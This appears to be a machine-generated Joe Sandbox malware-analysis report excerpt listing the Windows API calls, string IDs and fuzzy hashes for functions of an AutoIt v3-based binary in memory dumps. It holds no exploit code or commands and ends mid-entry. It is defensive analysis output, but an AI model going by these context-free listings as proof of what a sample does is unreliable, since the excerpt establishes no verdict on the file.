                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                    • String ID:
                                                    • API String ID: 1986165174-0
                                                    • Opcode ID: fe7c8f82708239f7d55e067a4af9d689c6da5131752bc0c1ae25b99226b64b18
                                                    • Instruction ID: 147d5a72fddc3018f3d158741b0eb6658741c73d72dc6ad6381e26a54988cb51
                                                    • Opcode Fuzzy Hash: fe7c8f82708239f7d55e067a4af9d689c6da5131752bc0c1ae25b99226b64b18
                                                    • Instruction Fuzzy Hash: E791B631589BC4DEC731DB7884505ABFFE5BF2A300F884A9ED0C797A42D238A548D769
                                                    APIs
                                                      • Part of subcall function 00790284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00782A58,?,00008000), ref: 007902A4
                                                      • Part of subcall function 007D4FEC: GetFileAttributesW.KERNEL32(?,007D3BFE), ref: 007D4FED
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 007D407C
                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 007D40CC
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 007D40DD
                                                    • FindClose.KERNEL32(00000000), ref: 007D40F4
                                                    • FindClose.KERNEL32(00000000), ref: 007D40FD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                    • String ID: \*.*
                                                    • API String ID: 2649000838-1173974218
                                                    • Opcode ID: 77735f80899b77f3f37ddb181fca733d6984b1ae3c25e8a3a26b3011367535d5
                                                    • Instruction ID: 76ed7656cd91326057f129d55bd1a7478e51231739a255cfb2830c6853eb18b9
                                                    • Opcode Fuzzy Hash: 77735f80899b77f3f37ddb181fca733d6984b1ae3c25e8a3a26b3011367535d5
                                                    • Instruction Fuzzy Hash: 33316331048385DFC701FB60D8999AFB7ECBE95304F444A5EF5E582291DB39D909CBA2
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 007D416D
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 007D417B
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 007D419B
                                                    • FindCloseChangeNotification.KERNEL32(00000000), ref: 007D4245
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 3243318325-0
                                                    • Opcode ID: 395f1cc134522c221ec82394438973afef38d1a42c875bbffd49cbdab372cff3
                                                    • Instruction ID: c57331a14f5e08afee9f31eba3314cd102b996f49715970149f9a8743eddf177
                                                    • Opcode Fuzzy Hash: 395f1cc134522c221ec82394438973afef38d1a42c875bbffd49cbdab372cff3
                                                    • Instruction Fuzzy Hash: 64314D71148341DBD304EF50E889AAEBBF8BF95350F40052EF585822A1EB75AA49CB92
                                                    APIs
                                                      • Part of subcall function 00783740: CharUpperBuffW.USER32(?,008371DC,00000001,?,00000000,008371DC,?,007753A5,?,?,?,?), ref: 0078375D
                                                    • _memmove.LIBCMT ref: 0077B68A
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper_memmove
                                                    • String ID:
                                                    • API String ID: 2819905725-0
                                                    • Opcode ID: 0f65732929f9a67fe889ad2ff69f7a059c3c3ad3d8f67df1b9a2eb4270217fea
                                                    • Instruction ID: b02512a2b423c2efd75704f40639f36570d0554f1009476dffd5d349046a49c2
                                                    • Opcode Fuzzy Hash: 0f65732929f9a67fe889ad2ff69f7a059c3c3ad3d8f67df1b9a2eb4270217fea
                                                    • Instruction Fuzzy Hash: 82A26870608741DFDB20DF28C484B6AB7E1BF88344F14895DE89A8B361D779ED85CB92
                                                    APIs
                                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 007E2AAD
                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 007E2AE4
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                    • String ID:
                                                    • API String ID: 599397726-0
                                                    • Opcode ID: 11041ac1bc76f16def4591836cf144219df631fcdf29292d6f498499cac976aa
                                                    • Instruction ID: 75993a0a0cca3978998a533dc3406ad855c03f9f3956ae3f91e7a9b9d9233be1
                                                    • Opcode Fuzzy Hash: 11041ac1bc76f16def4591836cf144219df631fcdf29292d6f498499cac976aa
                                                    • Instruction Fuzzy Hash: 90412971605249FFEB20DE56DC85EBB73BCEB44314F10806AFA01A3142E6799E429B60
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(?,007BFC86), ref: 007D495A
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 007D496B
                                                    • FindClose.KERNEL32(00000000), ref: 007D497B
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: FileFind$AttributesCloseFirst
                                                    • String ID:
                                                    • API String ID: 48322524-0
                                                    • Opcode ID: 846fab9835418e094a279fe3e001c162fbb901723817b9cf2f134498568695fc
                                                    • Instruction ID: 134cdb7df7a19620caa099a50b949946d33bd7e1f8b84dad8fb6a7cf48c022e7
                                                    • Opcode Fuzzy Hash: 846fab9835418e094a279fe3e001c162fbb901723817b9cf2f134498568695fc
                                                    • Instruction Fuzzy Hash: 5CE0DF31810505ABC3206738EC0D9EA776CAF06339F200706F835C22E0EB74A9448AD6
                                                    APIs
                                                    • timeGetTime.WINMM ref: 0077BF57
                                                      • Part of subcall function 007752B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007752E6
                                                    • Sleep.KERNEL32(0000000A,?,?), ref: 007B36B5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessagePeekSleepTimetime
                                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                    • API String ID: 1792118007-922114024
                                                    • Opcode ID: 22fa4d543df3b6933c9ff9265af9f44d886b216ba55dce1b660c52dc0aecae05
                                                    • Instruction ID: 1bbdaa1e824385f5dd14af696994e1fd1f14d6fd706a6cfc35e0b64f23d61a2b
                                                    • Opcode Fuzzy Hash: 22fa4d543df3b6933c9ff9265af9f44d886b216ba55dce1b660c52dc0aecae05
                                                    • Instruction Fuzzy Hash: 23C2D470608341DFDB24DF24C848BAAB7E5FF84344F14891DF58A972A1DB79E984CB92
                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00773444
                                                    • RegisterClassExW.USER32(00000030), ref: 0077346E
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0077347F
                                                    • InitCommonControlsEx.COMCTL32(?), ref: 0077349C
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007734AC
                                                    • LoadIconW.USER32(000000A9), ref: 007734C2
                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007734D1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-1005189915
                                                    • Opcode ID: e5764a627c1f279ec7bb6902646a3a1e8c6367667cf93375295197c6f62aa451
                                                    • Instruction ID: dee2a5e093b451685737f166ca2b4923e7535ac82242a2d80646c2d71a18ccb2
                                                    • Opcode Fuzzy Hash: e5764a627c1f279ec7bb6902646a3a1e8c6367667cf93375295197c6f62aa451
                                                    • Instruction Fuzzy Hash: 0C314AB1904309AFDB508FA4DC89BDDBBF0FF08310F10452AE555E62A0D7BA5645CF90
                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00773444
                                                    • RegisterClassExW.USER32(00000030), ref: 0077346E
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0077347F
                                                    • InitCommonControlsEx.COMCTL32(?), ref: 0077349C
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007734AC
                                                    • LoadIconW.USER32(000000A9), ref: 007734C2
                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007734D1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-1005189915
                                                    • Opcode ID: 7728f520895cec6dd0bdd7e1894f1f73dd7d363f03aa0e0c6b97f9351a53055a
                                                    • Instruction ID: ab4f0fb1768940948c0034b6251d5e6ea1184a2a39cf6659d66a9f3f7e5671c8
                                                    • Opcode Fuzzy Hash: 7728f520895cec6dd0bdd7e1894f1f73dd7d363f03aa0e0c6b97f9351a53055a
                                                    • Instruction Fuzzy Hash: 1A21E3B1904218AFEB509FA4EC89B9EBBF4FB08710F00852AFA15A62A0D7B55544CF95
                                                    APIs
                                                      • Part of subcall function 007900CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00783094), ref: 007900ED
                                                      • Part of subcall function 007908C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0078309F), ref: 007908E3
                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 007830E2
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 007C01BA
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 007C01FB
                                                    • RegCloseKey.ADVAPI32(?), ref: 007C0239
                                                    • _wcscat.LIBCMT ref: 007C0292
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                    • API String ID: 2673923337-2727554177
                                                    • Opcode ID: 5d5fdeda28c91278be97f35846b1ad83585699f69b26fa5a20c877cacbddfb25
                                                    • Instruction ID: bcd553c35fc3d4eeb5ab8c97ca1affd2f47b0c41161cc39fe965bf5e1edaf449
                                                    • Opcode Fuzzy Hash: 5d5fdeda28c91278be97f35846b1ad83585699f69b26fa5a20c877cacbddfb25
                                                    • Instruction Fuzzy Hash: E2715871549701DEC704EF69EC899ABBBA8FF84340F80092EF555C32A1EF749949CB92
                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00785156
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00785165
                                                    • LoadIconW.USER32(00000063), ref: 0078517C
                                                    • LoadIconW.USER32(000000A4), ref: 0078518E
                                                    • LoadIconW.USER32(000000A2), ref: 007851A0
                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007851C6
                                                    • RegisterClassExW.USER32(?), ref: 0078521C
                                                      • Part of subcall function 00773411: GetSysColorBrush.USER32(0000000F), ref: 00773444
                                                      • Part of subcall function 00773411: RegisterClassExW.USER32(00000030), ref: 0077346E
                                                      • Part of subcall function 00773411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0077347F
                                                      • Part of subcall function 00773411: InitCommonControlsEx.COMCTL32(?), ref: 0077349C
                                                      • Part of subcall function 00773411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007734AC
                                                      • Part of subcall function 00773411: LoadIconW.USER32(000000A9), ref: 007734C2
                                                      • Part of subcall function 00773411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007734D1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                    • String ID: #$0$AutoIt v3
                                                    • API String ID: 423443420-4155596026
                                                    • Opcode ID: cb9491bfd742b7d29c9ee27cc98ff2744ddaefacae37ab2a1009764de54ec54f
                                                    • Instruction ID: 6542512517b1c09f7dad82d2d3a08dc4a9ae5e0a7dd65432fd194eb1516d6cab
                                                    • Opcode Fuzzy Hash: cb9491bfd742b7d29c9ee27cc98ff2744ddaefacae37ab2a1009764de54ec54f
                                                    • Instruction Fuzzy Hash: BA216DB1D04309AFEB209FA4ED09B9E7BF5FB48310F004519F505A62A1C7B69540DF84
                                                    APIs
                                                    • WSAStartup.WSOCK32(00000101,?), ref: 007E5E7E
                                                    • inet_addr.WSOCK32(?,?,?), ref: 007E5EC3
                                                    • gethostbyname.WS2_32(?), ref: 007E5ECF
                                                    • IcmpCreateFile.IPHLPAPI ref: 007E5EDD
                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007E5F4D
                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007E5F63
                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 007E5FD8
                                                    • WSACleanup.WSOCK32 ref: 007E5FDE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                    • String ID: Ping
                                                    • API String ID: 1028309954-2246546115
                                                    • Opcode ID: d1c3d8d8fe8b7e90cf84469dbd8ac6340471237adff35fbec727f16a47a2fc35
                                                    • Instruction ID: 0b591ba1ef54b7854c2b7b56e5b19ff44d63edccd79093440a231f98ead9ddce
                                                    • Opcode Fuzzy Hash: d1c3d8d8fe8b7e90cf84469dbd8ac6340471237adff35fbec727f16a47a2fc35
                                                    • Instruction Fuzzy Hash: 2A518A31605745DFDB20EF25CC49B2AB7E4AF48724F148929F999DB2A1DB78E900CB42
                                                    APIs
                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00784E22
                                                    • KillTimer.USER32(?,00000001), ref: 00784E4C
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00784E6F
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00784E7A
                                                    • CreatePopupMenu.USER32 ref: 00784E8E
                                                    • PostQuitMessage.USER32(00000000), ref: 00784EAF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                    • String ID: TaskbarCreated
                                                    • API String ID: 129472671-2362178303
                                                    • Opcode ID: fb5e8ee0eaa864c5b6ce3c5fcb2a689b7832a230a9499c51ab6f9f6a23233555
                                                    • Instruction ID: 9faa0501a0faab4aac7cb655baa855d0c6ddaccaae8d3b1a61ece8b0900ffb28
                                                    • Opcode Fuzzy Hash: fb5e8ee0eaa864c5b6ce3c5fcb2a689b7832a230a9499c51ab6f9f6a23233555
                                                    • Instruction Fuzzy Hash: 8241D7B128420BEBEB757F64DC4DB7A3695F785301F000529F502D12A1CABDDC50D7A5
                                                    APIs
                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0077ADE1
                                                    • OleUninitialize.OLE32(?,00000000), ref: 0077AE80
                                                    • UnregisterHotKey.USER32(?), ref: 0077AFD7
                                                    • DestroyWindow.USER32(?), ref: 007B2F64
                                                    • FreeLibrary.KERNEL32(?), ref: 007B2FC9
                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 007B2FF6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                    • String ID: close all
                                                    • API String ID: 469580280-3243417748
                                                    • Opcode ID: 1f9b166ec0689203960d97343d6289739bd50110f2241ab127a5e943fbeb7398
                                                    • Instruction ID: 2a12bac1e41cdc44508d531ab9d48d43ad5b7364ed791382936b7cc05a2d8d2b
                                                    • Opcode Fuzzy Hash: 1f9b166ec0689203960d97343d6289739bd50110f2241ab127a5e943fbeb7398
                                                    • Instruction Fuzzy Hash: B0A15D70701212DFDB29EF14C499B69F365BF44740F1082ADE50AAB252DB39ED52CF91
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007E211C
                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 007E2148
                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 007E218A
                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 007E219F
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007E21AC
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 007E21DC
                                                    • InternetCloseHandle.WININET(00000000), ref: 007E2223
                                                      • Part of subcall function 007E2B4F: GetLastError.KERNEL32(?,?,007E1EE3,00000000,00000000,00000001), ref: 007E2B64
                                                      • Part of subcall function 007E2B4F: SetEvent.KERNEL32(?,?,007E1EE3,00000000,00000000,00000001), ref: 007E2B79
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                    • String ID:
                                                    • API String ID: 2603140658-3916222277
                                                    • Opcode ID: 1da7a5ba93f3c4851588834cb15ce8a64c58928ce263d2bd69757204ddd29610
                                                    • Instruction ID: aae34abee6e98d17172288efa9972ae70287d2e7dda258142e823ea0e8ccbeb2
                                                    • Opcode Fuzzy Hash: 1da7a5ba93f3c4851588834cb15ce8a64c58928ce263d2bd69757204ddd29610
                                                    • Instruction Fuzzy Hash: 6C4181B1502248BFEB129F51CC89FBB7BACFF0C354F004116FA059A142DB799E469BA1
                                                    APIs
                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007C0C5B
                                                      • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                    • _memset.LIBCMT ref: 00785787
                                                    • _wcscpy.LIBCMT ref: 007857DB
                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007857EB
                                                    • __swprintf.LIBCMT ref: 007C0CD1
                                                    Strings
